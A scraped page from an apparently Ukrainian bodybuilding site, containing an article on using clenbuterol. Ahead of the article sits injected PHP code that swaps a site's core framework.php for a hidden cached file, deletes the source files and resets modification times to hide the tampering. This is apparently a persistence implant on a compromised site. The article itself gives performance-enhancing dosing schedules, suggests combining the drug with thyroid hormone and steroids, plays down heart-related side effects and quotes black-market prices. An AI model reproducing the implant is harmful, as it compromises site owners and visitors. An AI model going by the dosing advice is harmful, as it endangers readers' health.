$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Кленбутерол | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Кленбутерол

КленбутеролКленбутерол – це дуже цікавий препарат, на який слід звернути увагу. Це не стероїдний гормон, а 2-бета - сімфатікокомметік. І все ж його можна порівняти по дії зі стероїдами. Подібно комбінації Вінстрола тривалої дії та оксандролону він сприяє солідному і якісному приросту м'язів, який доповнюється значним припливом сили. В першу чергу Кленбутерол володіє сильною анти - катаболічною дією, тобто він знижує відсоток руйнування протеїну в м'язових клітинах і сприяє збільшенню м'язової клітини. Тому численні атлети і застосовують Кленбутерол, особливо наприкінці стероїдного курсу, щоб притримати виникаючу катаболічну фазу і зберегти максимум сили і м'язової маси.

Інша властивість Кленбутерола в тому, що він володіє значним жироспалюючим ефектом. Він спалює жир без дієти з легким підйомом температури тіла, змушуючи цим організм використовувати жири як паливо для підігріву. Серед професіоналів Кленбутерол дуже популярний в період підготовки до змагань. Особливо інтенсивне спалювання жиру відбувається при комбінуванні його з препаратом гормону щитовидної залози "цітомель". При одночасному прийомі анаболічних або андрогенних стероїдів Кленбутерол, внаслідок викликаного ним підвищення температури тіла, підсилює дію цих стероїдів, оскільки прискорює білковий обмін в організмі.

Дозування залежить від ваги тіла і оптимізується залежно від вимірюваної температури тіла. Атлети приймають, як правило, 5 - 7 таблеток, тобто 100 - 140 мкг на день. Жінки задовольняються дозою в 80 - 100мкг на день. Важливо те, що атлет починає прийом препарату з однієї пігулки в перший день і потім щодня підвищує кількість, приймаючи в день на одну таблетку більше, поки не досягне бажаного максимуму дози. Існують різні схеми прийому препарату, де головною метою є спалювання жиру, співвідношення приросту сили і м'язової маси. Тривалість прийому препарату складає десь 8 - 10 тижнів. Оскільки Кленбутерол не є гормональним препаратом, він не має типових для анаболічних стероїдів побічних явищ. Тому його люблять жінки. Можливими побічними явищами Кленбутерола є почуття неспокою, прискорене серцебиття, легке тремтіння пальців, головні болі, посилена пітливість, сонливість, іноді м'язові спазми, підвищений тиск і нудота. Цікаво, що всі ці явища тимчасові і найчастіше зникають самі собою через 8 - 10 днів незважаючи на продовження прийому препарату. Кленбутерол сильно поширений на чорному ринку і коштує там 0,70 - 1,20 євро за одну таблетку на 0,02 мг. Вартість 100 таблеток Спіропента по 0,02 мг в німецьких аптеках приблизно дорівнює 45,36 євро. Хімічна речовина Кленбутеролгідрохлорид в Європі відпускається тільки за рецептами. На жаль існують підробки препарату. Як приклад, наведемо препарат у чарунковій упаковці з написом "Кленбутерол, фармахім Болгарія, по 0,02 мг". Оскільки Кленбутерол не виробляється в східноєвропейських державах, слід уникати вищеназваного препарату.
 
Статті СТЕРОЇДИ Кленбутерол